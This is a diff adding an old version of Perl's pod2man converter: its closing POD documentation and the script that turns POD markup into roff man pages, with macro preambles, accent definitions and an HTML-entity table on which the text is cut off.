+=item roff font should be 1 or 2 chars, not `%s'  (F)
+
+(F) The font specified with the C<--fixed> option was not
+a one- or two-digit roff font.
+
+=item %s is missing required section: %s
+
+(W) Required sections include NAME, DESCRIPTION, and if you're
+using a section starting with a 3, also a SYNOPSIS.  Actually,
+not having a NAME is a fatal.
+
+=item Unknown escape: %s in %s
+
+(W) An unknown HTML entity (probably for an 8-bit character) was given via
+a C<EE<lt>E<gt>> directive.  Besides amp, lt, gt, and quot, recognized
+entities are Aacute, aacute, Acirc, acirc, AElig, aelig, Agrave, agrave,
+Aring, aring, Atilde, atilde, Auml, auml, Ccedil, ccedil, Eacute, eacute,
+Ecirc, ecirc, Egrave, egrave, ETH, eth, Euml, euml, Iacute, iacute, Icirc,
+icirc, Igrave, igrave, Iuml, iuml, Ntilde, ntilde, Oacute, oacute, Ocirc,
+ocirc, Ograve, ograve, Oslash, oslash, Otilde, otilde, Ouml, ouml, szlig,
+THORN, thorn, Uacute, uacute, Ucirc, ucirc, Ugrave, ugrave, Uuml, uuml,
+Yacute, yacute, and yuml.
+
+=item Unmatched =back
+
+(W) You have a C<=back> without a corresponding C<=over>.
+
+=item Unrecognized pod directive: %s
+
+(W) You specified a pod directive that isn't in the known list of
+C<=head1>, C<=head2>, C<=item>, C<=over>, C<=back>, or C<=cut>.
+
+
+=back
+
+=head1 NOTES
+
+If you would like to print out a lot of man page continuously, you
+probably want to set the C and D registers to set contiguous page
+numbering and even/odd paging, at least on some versions of man(7).
+Settting the F register will get you some additional experimental
+indexing:
+
+    troff -man -rC1 -rD1 -rF1 perl.1 perldata.1 perlsyn.1 ...
+
+The indexing merely outputs messages via C<.tm> for each
+major page, section, subsection, item, and any C<XE<lt>E<gt>>
+directives.
+
+
+=head1 RESTRICTIONS
+
+None at this time.
+
+=head1 BUGS
+
+The =over and =back directives don't really work right.  They
+take absolute positions instead of offsets, don't nest well, and
+making people count is suboptimal in any event.
+
+=head1 AUTHORS
+
+Original prototype by Larry Wall, but so massively hacked over by
+Tom Christiansen such that Larry probably doesn't recognize it anymore.
+
+=cut
+
+$/ = "";
+$cutting = 1;
+@Indices = ();
+
+# We try first to get the version number from a local binary, in case we're
+# running an installed version of Perl to produce documentation from an
+# uninstalled newer version's pod files.
+if ($^O ne 'plan9' and $^O ne 'dos' and $^O ne 'os2' and $^O ne 'MSWin32') {
+  my $perl = (-x './perl' && -f './perl' ) ?
+                 './perl' :
+                 ((-x '../perl' && -f '../perl') ?
+                      '../perl' :
+                      '');
+  ($version,$patch) = `$perl -e 'print $]'` =~ /^(\d\.\d{3})(\d{2})?/ if $perl;
+}
+# No luck; we'll just go with the running Perl's version
+($version,$patch) = $] =~ /^(.{5})(\d{2})?/ unless $version;
+$DEF_RELEASE  = "perl $version";
+$DEF_RELEASE .= ", patch $patch" if $patch;
+
+
+sub makedate {
+    my $secs = shift;
+    my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime($secs);
+    my $mname = (qw{Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec})[$mon];
+    $year += 1900;
+    return "$mday/$mname/$year";
+}
+
+use Getopt::Long;
+
+$DEF_SECTION = 1;
+$DEF_CENTER = "User Contributed Perl Documentation";
+$STD_CENTER = "Perl Programmers Reference Guide";
+$DEF_FIXED = 'CW';
+$DEF_LAX = 0;
+
+sub usage {
+    warn "$0: @_\n" if @_;
+    die <<EOF;
+usage: $0 [options] podpage
+Options are:
+	--section=manext      (default "$DEF_SECTION")
+	--release=relpatch    (default "$DEF_RELEASE")
+	--center=string       (default "$DEF_CENTER")
+	--date=string         (default "$DEF_DATE")
+	--fixed=font	      (default "$DEF_FIXED")
+	--official	      (default NOT)
+	--lax                 (default NOT)
+EOF
+}
+
+$uok = GetOptions( qw(
+	section=s
+	release=s
+	center=s
+	date=s
+	fixed=s
+	official
+	lax
+	help));
+
+$DEF_DATE = makedate((stat($ARGV[0]))[9] || time());
+
+usage("Usage error!") unless $uok;
+usage() if $opt_help;
+usage("Need one and only one podpage argument") unless @ARGV == 1;
+
+$section = $opt_section || ($ARGV[0] =~ /\.pm$/
+				? $DEF_PM_SECTION : $DEF_SECTION);
+$RP = $opt_release || $DEF_RELEASE;
+$center = $opt_center || ($opt_official ? $STD_CENTER : $DEF_CENTER);
+$lax = $opt_lax || $DEF_LAX;
+
+$CFont = $opt_fixed || $DEF_FIXED;
+
+if (length($CFont) == 2) {
+    $CFont_embed = "\\f($CFont";
+}
+elsif (length($CFont) == 1) {
+    $CFont_embed = "\\f$CFont";
+}
+else {
+    die "roff font should be 1 or 2 chars, not `$CFont_embed'";
+}
+
+$date = $opt_date || $DEF_DATE;
+
+for (qw{NAME DESCRIPTION}) {
+# for (qw{NAME DESCRIPTION AUTHOR}) {
+    $wanna_see{$_}++;
+}
+$wanna_see{SYNOPSIS}++ if $section =~ /^3/;
+
+
+$name = @ARGV ? $ARGV[0] : "<STDIN>";
+$Filename = $name;
+if ($section =~ /^1/) {
+    require File::Basename;
+    $name = uc File::Basename::basename($name);
+}
+$name =~ s/\.(pod|p[lm])$//i;
+
+# Lose everything up to the first of
+#     */lib/*perl*	standard or site_perl module
+#     */*perl*/lib	from -D prefix=/opt/perl
+#     */*perl*/		random module hierarchy
+# which works.
+$name =~ s-//+-/-g;
+if ($name =~ s-^.*?/lib/[^/]*perl[^/]*/--i
+	or $name =~ s-^.*?/[^/]*perl[^/]*/lib/--i
+	or $name =~ s-^.*?/[^/]*perl[^/]*/--i) {
+    # Lose ^site(_perl)?/.
+    $name =~ s-^site(_perl)?/--;
+    # Lose ^arch/.	(XXX should we use Config? Just for archname?)
+    $name =~ s~^(.*-$^O|$^O-.*)/~~o;
+    # Lose ^version/.
+    $name =~ s-^\d+\.\d+/--;
+}
+
+# Translate Getopt/Long to Getopt::Long, etc.
+$name =~ s(/)(::)g;
+
+if ($name ne 'something') {
+    FCHECK: {
+	open(F, "< $ARGV[0]") || die "can't open $ARGV[0]: $!";
+	while (<F>) {
+	    next unless /^=\b/;
+	    if (/^=head1\s+NAME\s*$/) {  # an /m would forgive mistakes
+		$_ = <F>;
+		unless (/\s*-+\s+/) {
+		    $oops++;
+		    warn "$0: Improper man page - no dash in NAME header in paragraph $. of $ARGV[0]\n"
+                } else {
+		    my @n = split /\s+-+\s+/;
+		    if (@n != 2) {
+			$oops++;
+			warn "$0: Improper man page - malformed NAME header in paragraph $. of $ARGV[0]\n"
+		    }
+		    else {
+			$n[0] =~ s/\n/ /g;
+			$n[1] =~ s/\n/ /g;
+			%namedesc = @n;
+		    }
+		}
+		last FCHECK;
+	    }
+	    next if /^=cut\b/;	# DB_File and Net::Ping have =cut before NAME
+	    next if /^=pod\b/;  # It is OK to have =pod before NAME
+	    next if /^=(for|begin|end)\s+comment\b/;  # It is OK to have =for =begin or =end comment before NAME
+	    die "$0: Invalid man page - 1st pod line is not NAME in $ARGV[0]\n" unless $lax;
+	}
+	die "$0: Invalid man page - no documentation in $ARGV[0]\n" unless $lax;
+    }
+    close F;
+}
+
+print <<"END";
+.rn '' }`
+''' \$RCSfile\$\$Revision\$\$Date\$
+'''
+''' \$Log\$
+'''
+.de Sh
+.br
+.if t .Sp
+.ne 5
+.PP
+\\fB\\\\\$1\\fR
+.PP
+..
+.de Sp
+.if t .sp .5v
+.if n .sp
+..
+.de Ip
+.br
+.ie \\\\n(.\$>=3 .ne \\\\\$3
+.el .ne 3
+.IP "\\\\\$1" \\\\\$2
+..
+.de Vb
+.ft $CFont
+.nf
+.ne \\\\\$1
+..
+.de Ve
+.ft R
+
+.fi
+..
+'''
+'''
+'''     Set up \\*(-- to give an unbreakable dash;
+'''     string Tr holds user defined translation string.
+'''     Bell System Logo is used as a dummy character.
+'''
+.tr \\(*W-|\\(bv\\*(Tr
+.ie n \\{\\
+.ds -- \\(*W-
+.ds PI pi
+.if (\\n(.H=4u)&(1m=24u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-12u'-\\" diablo 10 pitch
+.if (\\n(.H=4u)&(1m=20u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-8u'-\\" diablo 12 pitch
+.ds L" ""
+.ds R" ""
+'''   \\*(M", \\*(S", \\*(N" and \\*(T" are the equivalent of
+'''   \\*(L" and \\*(R", except that they are used on ".xx" lines,
+'''   such as .IP and .SH, which do another additional levels of
+'''   double-quote interpretation
+.ds M" """
+.ds S" """
+.ds N" """""
+.ds T" """""
+.ds L' '
+.ds R' '
+.ds M' '
+.ds S' '
+.ds N' '
+.ds T' '
+'br\\}
+.el\\{\\
+.ds -- \\(em\\|
+.tr \\*(Tr
+.ds L" ``
+.ds R" ''
+.ds M" ``
+.ds S" ''
+.ds N" ``
+.ds T" ''
+.ds L' `
+.ds R' '
+.ds M' `
+.ds S' '
+.ds N' `
+.ds T' '
+.ds PI \\(*p
+'br\\}
+END
+
+print <<'END';
+.\"	If the F register is turned on, we'll generate
+.\"	index entries out stderr for the following things:
+.\"		TH	Title 
+.\"		SH	Header
+.\"		Sh	Subsection 
+.\"		Ip	Item
+.\"		X<>	Xref  (embedded
+.\"	Of course, you have to process the output yourself
+.\"	in some meaninful fashion.
+.if \nF \{
+.de IX
+.tm Index:\\$1\t\\n%\t"\\$2"
+..
+.nr % 0
+.rr F
+.\}
+END
+
+print <<"END";
+.TH $name $section "$RP" "$date" "$center"
+.UC
+END
+
+push(@Indices, qq{.IX Title "$name $section"});
+
+while (($name, $desc) = each %namedesc) {
+    for ($name, $desc) { s/^\s+//; s/\s+$//; }
+    push(@Indices, qq(.IX Name "$name - $desc"\n));
+}
+
+print <<'END';
+.if n .hy 0
+.if n .na
+.ds C+ C\v'-.1v'\h'-1p'\s-2+\h'-1p'+\s0\v'.1v'\h'-1p'
+.de CQ          \" put $1 in typewriter font
+END
+print ".ft $CFont\n";
+print <<'END';
+'if n "\c
+'if t \\&\\$1\c
+'if n \\&\\$1\c
+'if n \&"
+\\&\\$2 \\$3 \\$4 \\$5 \\$6 \\$7
+'.ft R
+..
+.\" @(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2
+.	\" AM - accent mark definitions
+.bd B 3
+.	\" fudge factors for nroff and troff
+.if n \{\
+.	ds #H 0
+.	ds #V .8m
+.	ds #F .3m
+.	ds #[ \f1
+.	ds #] \fP
+.\}
+.if t \{\
+.	ds #H ((1u-(\\\\n(.fu%2u))*.13m)
+.	ds #V .6m
+.	ds #F 0
+.	ds #[ \&
+.	ds #] \&
+.\}
+.	\" simple accents for nroff and troff
+.if n \{\
+.	ds ' \&
+.	ds ` \&
+.	ds ^ \&
+.	ds , \&
+.	ds ~ ~
+.	ds ? ?
+.	ds ! !
+.	ds /
+.	ds q
+.\}
+.if t \{\
+.	ds ' \\k:\h'-(\\n(.wu*8/10-\*(#H)'\'\h"|\\n:u"
+.	ds ` \\k:\h'-(\\n(.wu*8/10-\*(#H)'\`\h'|\\n:u'
+.	ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'^\h'|\\n:u'
+.	ds , \\k:\h'-(\\n(.wu*8/10)',\h'|\\n:u'
+.	ds ~ \\k:\h'-(\\n(.wu-\*(#H-.1m)'~\h'|\\n:u'
+.	ds ? \s-2c\h'-\w'c'u*7/10'\u\h'\*(#H'\zi\d\s+2\h'\w'c'u*8/10'
+.	ds ! \s-2\(or\s+2\h'-\w'\(or'u'\v'-.8m'.\v'.8m'
+.	ds / \\k:\h'-(\\n(.wu*8/10-\*(#H)'\z\(sl\h'|\\n:u'
+.	ds q o\h'-\w'o'u*8/10'\s-4\v'.4m'\z\(*i\v'-.4m'\s+4\h'\w'o'u*8/10'
+.\}
+.	\" troff and (daisy-wheel) nroff accents
+.ds : \\k:\h'-(\\n(.wu*8/10-\*(#H+.1m+\*(#F)'\v'-\*(#V'\z.\h'.2m+\*(#F'.\h'|\\n:u'\v'\*(#V'
+.ds 8 \h'\*(#H'\(*b\h'-\*(#H'
+.ds v \\k:\h'-(\\n(.wu*9/10-\*(#H)'\v'-\*(#V'\*(#[\s-4v\s0\v'\*(#V'\h'|\\n:u'\*(#]
+.ds _ \\k:\h'-(\\n(.wu*9/10-\*(#H+(\*(#F*2/3))'\v'-.4m'\z\(hy\v'.4m'\h'|\\n:u'
+.ds . \\k:\h'-(\\n(.wu*8/10)'\v'\*(#V*4/10'\z.\v'-\*(#V*4/10'\h'|\\n:u'
+.ds 3 \*(#[\v'.2m'\s-2\&3\s0\v'-.2m'\*(#]
+.ds o \\k:\h'-(\\n(.wu+\w'\(de'u-\*(#H)/2u'\v'-.3n'\*(#[\z\(de\v'.3n'\h'|\\n:u'\*(#]
+.ds d- \h'\*(#H'\(pd\h'-\w'~'u'\v'-.25m'\f2\(hy\fP\v'.25m'\h'-\*(#H'
+.ds D- D\\k:\h'-\w'D'u'\v'-.11m'\z\(hy\v'.11m'\h'|\\n:u'
+.ds th \*(#[\v'.3m'\s+1I\s-1\v'-.3m'\h'-(\w'I'u*2/3)'\s-1o\s+1\*(#]
+.ds Th \*(#[\s+2I\s-2\h'-\w'I'u*3/5'\v'-.3m'o\v'.3m'\*(#]
+.ds ae a\h'-(\w'a'u*4/10)'e
+.ds Ae A\h'-(\w'A'u*4/10)'E
+.ds oe o\h'-(\w'o'u*4/10)'e
+.ds Oe O\h'-(\w'O'u*4/10)'E
+.	\" corrections for vroff
+.if v .ds ~ \\k:\h'-(\\n(.wu*9/10-\*(#H)'\s-2\u~\d\s+2\h'|\\n:u'
+.if v .ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'\v'-.4m'^\v'.4m'\h'|\\n:u'
+.	\" for low resolution devices (crt and lpr)
+.if \n(.H>23 .if \n(.V>19 \
+\{\
+.	ds : e
+.	ds 8 ss
+.	ds v \h'-1'\o'\(aa\(ga'
+.	ds _ \h'-1'^
+.	ds . \h'-1'.
+.	ds 3 3
+.	ds o a
+.	ds d- d\h'-1'\(ga
+.	ds D- D\h'-1'\(hy
+.	ds th \o'bp'
+.	ds Th \o'LP'
+.	ds ae ae
+.	ds Ae AE
+.	ds oe oe
+.	ds Oe OE
+.\}
+.rm #[ #] #H #V #F C
+END
+
+$indent = 0;
+
+$begun = "";
+
+# Unrolling [^A-Z>]|[A-Z](?!<) gives:    // MRE pp 165.
+my $nonest = '(?:[^A-Z>]*(?:[A-Z](?!<)[^A-Z>]*)*)';
+
+while (<>) {
+    if ($cutting) {
+	next unless /^=/;
+	$cutting = 0;
+    }
+    if ($begun) {
+	if (/^=end\s+$begun/) {
+            $begun = "";
+	}
+	elsif ($begun =~ /^(roff|man)$/) {
+	    print STDOUT $_;
+        }
+	next;
+    }
+    chomp;
+
+    # Translate verbatim paragraph
+
+    if (/^\s/) {
+	@lines = split(/\n/);
+	for (@lines) {
+	    1 while s
+		{^( [^\t]* ) \t ( \t* ) }
+		{ $1 . ' ' x (8 - (length($1)%8) + 8 * (length($2))) }ex;
+	    s/\\/\\e/g;
+	    s/\A/\\&/s;
+	}
+	$lines = @lines;
+	makespace() unless $verbatim++;
+	print ".Vb $lines\n";
+	print join("\n", @lines), "\n";
+	print ".Ve\n";
+	$needspace = 0;
+	next;
+    }
+
+    $verbatim = 0;
+
+    if (/^=for\s+(\S+)\s*/s) {
+	if ($1 eq "man" or $1 eq "roff") {
+	    print STDOUT $',"\n\n";
+	} else {
+	    # ignore unknown for
+	}
+	next;
+    }
+    elsif (/^=begin\s+(\S+)\s*/s) {
+	$begun = $1;
+	if ($1 eq "man" or $1 eq "roff") {
+	    print STDOUT $'."\n\n";
+	}
+	next;
+    }
+
+    # check for things that'll hosed our noremap scheme; affects $_
+    init_noremap();
+
+    if (!/^=item/) {
+
+	# trofficate backslashes; must do it before what happens below
+	s/\\/noremap('\\e')/ge;
+
+	# protect leading periods and quotes against *roff
+	# mistaking them for directives
+	s/^(?:[A-Z]<)?[.']/\\&$&/gm;
+
+	# first hide the escapes in case we need to
+	# intuit something and get it wrong due to fmting
+
+	1 while s/([A-Z]<$nonest>)/noremap($1)/ge;
+
+	# func() is a reference to a perl function
+	s{
+	    \b
+	    (
+		[:\w]+ \(\)
+	    )
+	} {I<$1>}gx;
+
+	# func(n) is a reference to a perl function or a man page
+	s{
+	    ([:\w]+)
+	    (
+		\( [^\051]+ \)
+	    )
+	} {I<$1>\\|$2}gx;
+
+	# convert simple variable references
+	s/(\s+)([\$\@%][\w:]+)(?!\()/${1}C<$2>/g;
+
+	if (m{ (
+		    [\-\w]+
+		    \(
+			[^\051]*?
+			[\@\$,]
+			[^\051]*?
+		    \)
+		)
+	    }x && $` !~ /([LCI]<[^<>]*|-)$/ && !/^=\w/)
+	{
+	    warn "$0: bad option in paragraph $. of $ARGV: ``$1'' should be [LCI]<$1>\n";
+	    $oops++;
+	}
+
+	while (/(-[a-zA-Z])\b/g && $` !~ /[\w\-]$/) {
+	    warn "$0: bad option in paragraph $. of $ARGV: ``$1'' should be [CB]<$1>\n";
+	    $oops++;
+	}
+
+	# put it back so we get the <> processed again;
+	clear_noremap(0); # 0 means leave the E's
+
+    } else {
+	# trofficate backslashes
+	s/\\/noremap('\\e')/ge;
+
+    }
+
+    # need to hide E<> first; they're processed in clear_noremap
+    s/(E<[^<>]+>)/noremap($1)/ge;
+
+
+    $maxnest = 10;
+    while ($maxnest-- && /[A-Z]</) {
+
+	# can't do C font here
+	s/([BI])<($nonest)>/font($1) . $2 . font('R')/eg;
+
+	# files and filelike refs in italics
+	s/F<($nonest)>/I<$1>/g;
+
+	# no break -- usually we want C<> for this
+	s/S<($nonest)>/nobreak($1)/eg;
+
+	# LREF: a la HREF L<show this text|man/section>
+	s:L<([^|>]+)\|[^>]+>:$1:g;
+
+	# LREF: a manpage(3f)
+	s:L<([a-zA-Z][^\s\/]+)(\([^\)]+\))?>:the I<$1>$2 manpage:g;
+
+	# LREF: an =item on another manpage
+	s{
+	    L<
+		([^/]+)
+		/
+		(
+		    [:\w]+
+		    (\(\))?
+		)
+	    >
+	} {the C<$2> entry in the I<$1> manpage}gx;
+
+	# LREF: an =item on this manpage
+	s{
+	   ((?:
+	    L<
+		/
+		(
+		    [:\w]+
+		    (\(\))?
+		)
+	    >
+	    (,?\s+(and\s+)?)?
+	  )+)
+	} { internal_lrefs($1) }gex;
+
+	# LREF: a =head2 (head1?), maybe on a manpage, maybe right here
+	# the "func" can disambiguate
+	s{
+	    L<
+		(?:
+		    ([a-zA-Z]\S+?) /
+		)?
+		"?(.*?)"?
+	    >
+	}{
+	    do {
+		$1 	# if no $1, assume it means on this page.
+		    ?  "the section on I<$2> in the I<$1> manpage"
+		    :  "the section on I<$2>"
+	    }
+	}gesx; # s in case it goes over multiple lines, so . matches \n
+
+	s/Z<>/\\&/g;
+
+	# comes last because not subject to reprocessing
+	s/C<($nonest)>/noremap("${CFont_embed}${1}\\fR")/eg;
+    }
+
+    if (s/^=//) {
+	$needspace = 0;		# Assume this.
+
+	s/\n/ /g;
+
+	($Cmd, $_) = split(' ', $_, 2);
+
+	$dotlevel = 1;
+	if ($Cmd eq 'head1') {
+	   $dotlevel = 1;
+	}
+	elsif ($Cmd eq 'head2') {
+	   $dotlevel = 1;
+	}
+	elsif ($Cmd eq 'item') {
+	   $dotlevel = 2;
+	}
+
+	if (defined $_) {
+	    &escapes($dotlevel);
+	    s/"/""/g;
+	}
+
+	clear_noremap(1);
+
+	if ($Cmd eq 'cut') {
+	    $cutting = 1;
+	}
+	elsif ($Cmd eq 'head1') {
+	    s/\s+$//;
+	    delete $wanna_see{$_} if exists $wanna_see{$_};
+	    print qq{.SH "$_"\n};
+      push(@Indices, qq{.IX Header "$_"\n});
+	}
+	elsif ($Cmd eq 'head2') {
+	    print qq{.Sh "$_"\n};
+      push(@Indices, qq{.IX Subsection "$_"\n});
+	}
+	elsif ($Cmd eq 'over') {
+	    push(@indent,$indent);
+	    $indent += ($_ + 0) || 5;
+	}
+	elsif ($Cmd eq 'back') {
+	    $indent = pop(@indent);
+	    warn "$0: Unmatched =back in paragraph $. of $ARGV\n" unless defined $indent;
+	    $needspace = 1;
+	}
+	elsif ($Cmd eq 'item') {
+	    s/^\*( |$)/\\(bu$1/g;
+	    # if you know how to get ":s please do
+	    s/\\\*\(L"([^"]+?)\\\*\(R"/'$1'/g;
+	    s/\\\*\(L"([^"]+?)""/'$1'/g;
+	    s/[^"]""([^"]+?)""[^"]/'$1'/g;
+	    # here do something about the $" in perlvar?
+	    print STDOUT qq{.Ip "$_" $indent\n};
+      push(@Indices, qq{.IX Item "$_"\n});
+	}
+	elsif ($Cmd eq 'pod') {
+	    # this is just a comment
+	} 
+	else {
+	    warn "$0: Unrecognized pod directive in paragraph $. of $ARGV: $Cmd\n";
+	}
+    }
+    else {
+	if ($needspace) {
+	    &makespace;
+	}
+	&escapes(0);
+	clear_noremap(1);
+	print $_, "\n";
+	$needspace = 1;
+    }
+}
+
+print <<"END";
+
+.rn }` ''
+END
+
+if (%wanna_see && !$lax) {
+    @missing = keys %wanna_see;
+    warn "$0: $Filename is missing required section"
+	.  (@missing > 1 && "s")
+	.  ": @missing\n";
+    $oops++;
+}
+
+foreach (@Indices) { print "$_\n"; }
+
+exit;
+#exit ($oops != 0);
+
+#########################################################################
+
+sub nobreak {
+    my $string = shift;
+    $string =~ s/ /\\ /g;
+    $string;
+}
+
+sub escapes {
+    my $indot = shift;
+
+    s/X<(.*?)>/mkindex($1)/ge;
+
+    # translate the minus in foo-bar into foo\-bar for roff
+    s/([^0-9a-z-])-([^-])/$1\\-$2/g;
+
+    # make -- into the string version \*(-- (defined above)
+    s/\b--\b/\\*(--/g;
+    s/"--([^"])/"\\*(--$1/g;  # should be a better way
+    s/([^"])--"/$1\\*(--"/g;
+
+    # fix up quotes; this is somewhat tricky
+    my $dotmacroL = 'L';
+    my $dotmacroR = 'R';
+    if ( $indot == 1 ) {
+	$dotmacroL = 'M';
+	$dotmacroR = 'S';
+    }  
+    elsif ( $indot >= 2 ) {
+	$dotmacroL = 'N';
+	$dotmacroR = 'T';
+    }  
+    if (!/""/) {
+	s/(^|\s)(['"])/noremap("$1\\*($dotmacroL$2")/ge;
+	s/(['"])($|[\-\s,;\\!?.])/noremap("\\*($dotmacroR$1$2")/ge;
+    }
+
+    #s/(?!")(?:.)--(?!")(?:.)/\\*(--/g;
+    #s/(?:(?!")(?:.)--(?:"))|(?:(?:")--(?!")(?:.))/\\*(--/g;
+
+
+    # make sure that func() keeps a bit a space tween the parens
+    ### s/\b\(\)/\\|()/g;
+    ### s/\b\(\)/(\\|)/g;
+
+    # make C++ into \*C+, which is a squinched version (defined above)
+    s/\bC\+\+/\\*(C+/g;
+
+    # make double underbars have a little tiny space between them
+    s/__/_\\|_/g;
+
+    # PI goes to \*(PI (defined above)
+    s/\bPI\b/noremap('\\*(PI')/ge;
+
+    # make all caps a teeny bit smaller, but don't muck with embedded code literals
+    my $hidCFont = font('C');
+    if ($Cmd !~ /^head1/) { # SH already makes smaller
+	# /g isn't enough; 1 while or we'll be off
+
+#	1 while s{
+#	    (?!$hidCFont)(..|^.|^)
+#	    \b
+#	    (
+#		[A-Z][\/A-Z+:\-\d_$.]+
+#	    )
+#	    (s?) 		
+#	    \b
+#	} {$1\\s-1$2\\s0}gmox;
+
+	1 while s{
+	    (?!$hidCFont)(..|^.|^)
+	    (
+		\b[A-Z]{2,}[\/A-Z+:\-\d_\$]*\b
+	    )
+	} {
+	    $1 . noremap( '\\s-1' .  $2 . '\\s0' )
+	}egmox;
+
+    }
+}
+
+# make troff just be normal, but make small nroff get quoted
+# decided to just put the quotes in the text; sigh;
+sub ccvt {
+    local($_,$prev) = @_;
+    noremap(qq{.CQ "$_" \n\\&});
+}
+
+sub makespace {
+    if ($indent) {
+	print ".Sp\n";
+    }
+    else {
+	print ".PP\n";
+    }
+}
+
+sub mkindex {
+    my ($entry) = @_;
+    my @entries = split m:\s*/\s*:, $entry;
+    push @Indices, ".IX Xref " . join ' ', map {qq("$_")} @entries;
+    return '';
+}
+
+sub font {
+    local($font) = shift;
+    return '\\f' . noremap($font);
+}
+
+sub noremap {
+    local($thing_to_hide) = shift;
+    $thing_to_hide =~ tr/\000-\177/\200-\377/;
+    return $thing_to_hide;
+}
+
+sub init_noremap {
+	# escape high bit characters in input stream
+	s/([\200-\377])/"E<".ord($1).">"/ge;
+}
+
+sub clear_noremap {
+    my $ready_to_print = $_[0];
+
+    tr/\200-\377/\000-\177/;
+
+    # trofficate backslashes
+    # s/(?!\\e)(?:..|^.|^)\\/\\e/g;
+
+    # now for the E<>s, which have been hidden until now
+    # otherwise the interative \w<> processing would have
+    # been hosed by the E<gt>
+    s {
+	    E<
+	    (
+	        ( \d + ) 
+	        | ( [A-Za-z]+ )	
+	    )
+	    >	
+    } {
+	 do {
+	     defined $2
+		? chr($2)
+		:	
+	     exists $HTML_Escapes{$3}
+		? do { $HTML_Escapes{$3} }
+		: do {
+		    warn "$0: Unknown escape in paragraph $. of $ARGV: ``$&''\n";
+		    "E<$1>";
+		}
+	 }
+    }egx if $ready_to_print;
+}
+
+sub internal_lrefs {
+    local($_) = shift;
+    local $trailing_and = s/and\s+$// ? "and " : "";
+
+    s{L</([^>]+)>}{$1}g;
+    my(@items) = split( /(?:,?\s+(?:and\s+)?)/ );
+    my $retstr = "the ";
+    my $i;
+    for ($i = 0; $i <= $#items; $i++) {
+	$retstr .= "C<$items[$i]>";
+	$retstr .= ", " if @items > 2 && $i != $#items;
+	$retstr .= " and " if $i+2 == @items;
+    }
+
+    $retstr .= " entr" . ( @items > 1  ? "ies" : "y" )
+	    .  " elsewhere in this document";
+    # terminal space to avoid words running together (pattern used
+    # strips terminal spaces)
+    $retstr .= " " if length $trailing_and;
+    $retstr .=  $trailing_and;
+
+    return $retstr;
+
+}
+
+BEGIN {
+%HTML_Escapes = (
+    'amp'	=>	'&',	#   ampersand
+    'lt'	=>	'<',	#   left chevron, less-than
+    'gt'	=>	'>',	#   right chevron, greater-than
+    'quot'	=>	'"',	#   double quote
+
+    "Aacute"	=>	"A\\*'",	#   capital A, acute accent
+    "aacute"	=>	"a\\*'",	#   small a, acute accent
+    "Acirc"	=>	"A\\*^",	#   capital A, circumflex accent
+    "acirc"	=>	"a\\*^",	#   small a, circumflex accent
+    "AElig"	=>	'\*(AE',	#   capital AE diphthong (ligature)
+    "aelig"	=>	'\*(ae',	#   small ae diphthong (ligature)
+    "Agrave"	=>	"A\\*`",	#   capital A, grave accent
+    "agrave"	=>	"A\\*`",	#   small a, grave accent
+    "Aring"	=>	'A\\*o',	#   capital A, ring
+    "aring"	=>	'a\\*o',	#   small a, ring
+    "Atilde"	=>	'A\\*~',	#   capital A, tilde
+    "atilde"	=>	'a\\*~',	#   small a, tilde
+    "Auml"	=>	'A\\*:',	#   capital A, dieresis or umlaut mark
+    "auml"	=>	'a\\*:',	#   small a, dieresis or umlaut mark
+    "Ccedil"	=>	'C\\*,',	#   capital C, cedilla
+    "ccedil"	=>	'c\\*,',	#   small c, cedilla
+    "Eacute"	=>	"E\\*'",	#   capital E, acute accent
+    "eacute"	=>	"e\\*'",	#   small e, acute accent
+    "Ecirc"	=>	"E\\*^",	#   capital E, circumflex accent
+    "ecirc"	=>	"e\\*^",	#   small e, circumflex accent
+    "Egrave"	=>	"E\\*`",	#   capital E, grave accent
+    "egrave"	=>	"e\\*`",	#   small e, grave accent
+    "ETH"	=>	'\\*(D-',	#   capital Eth, Icelandic
+    "eth"	=>	'\\*(d-',	#   small eth, Icelandic
+    "Euml"	=>	"E\\*:",	#   capital E, dieresis or umlaut mark
+    "euml"	=>	"e\\*:",	#   small e, dieresis or umlaut mark
+    "Iacute"	=>	"I\\*'",	#   capital I, acute accent
+    "iacute"	=>	"i\\*'",	#   small i, acute accent
+    "Icirc"	=>	"I\\*^",	#   capital I, circumflex accent
+    "icirc"	=>	"i\\*^",	#   small i, circumflex accent
+    "Igrave"	=>	"I\\*`",	#   capital I, grave accent
+    "igrave"	=>	"i\\*`",	#   small i, grave accent
+    "Iuml"	=>	"I\\*:",	#   capital I, dieresis or umlaut mark
+    "iuml"	=>	"i\\*:",	#   small i, dieresis or umlaut mark
+    "Ntilde"	=>	'N\*~',		#   capital N, tilde
+    "ntilde"	=>	'n\*~',		#   small n, tilde
+    "Oacute"	=>	"O\\*'",	#   capital O, acute accent
+    "oacute"	=>	"o\\*'",	#   small o, acute accent
+    "Ocirc"	=>	"O\\*^",	#   capital O, circumflex accent
+    "ocirc"	=>	"o\\*^",	#   small o, circumflex accent
+    "Ograve"	=>	"O\\*`",	#   capital O, grave accent
+    "ograve"	=>	"o\\*`",	#   small o, grave accent
+    "Oslash"	=>	"O\\*/",	#   capital O, slash
+    "oslash"	=>	"o\\*/",	#   small o, slash
+    "Otilde"	=>	"O\\*~",	#   capital O, tilde
+    "otilde"	=>	"o\\*~",	#   small o, tilde
+    "Ouml"	=>	"O\\*:",	#   capital O, dieresis or umlaut mark
+    "ouml"	=>	"o\\*:",	#   small o, dieresis or umlaut mark
+    "szlig"	=>	'\*8',		#   small sharp s, German (sz ligature)
+    "THORN"	=>	'\\*(Th',	#   capital THORN, Icelandic
+    "thorn"	=>	'\\*(th',,	#   small thorn, Icelandic
+    "Uacute"	=>	"U\\*'",	#   capital U, acute accent
+    "uacute"	=>	"u\\*'",	#   small u, acute accent
+    "Ucirc"	=>	"U\\*^",	#   capital U, circumflex accent
+    "ucirc"	=>	"u\\*^",	#   small u, circumflex accent
+    "Ugrave"	=>	"U\\*`",	#   capital U, grave accent
+    "ugrave"	=>	"u\\*`",	#   small u, grave accent
+    "Uuml"	=>	"U\\*:",	#   capital U, dieresis or umlaut mark
+    "uuml"	=>	"u\\*:",	#   small u, dieresis or umlaut mark
+    "Yacute"	=>	"Y\\*'",	#   capital Y, acute accent
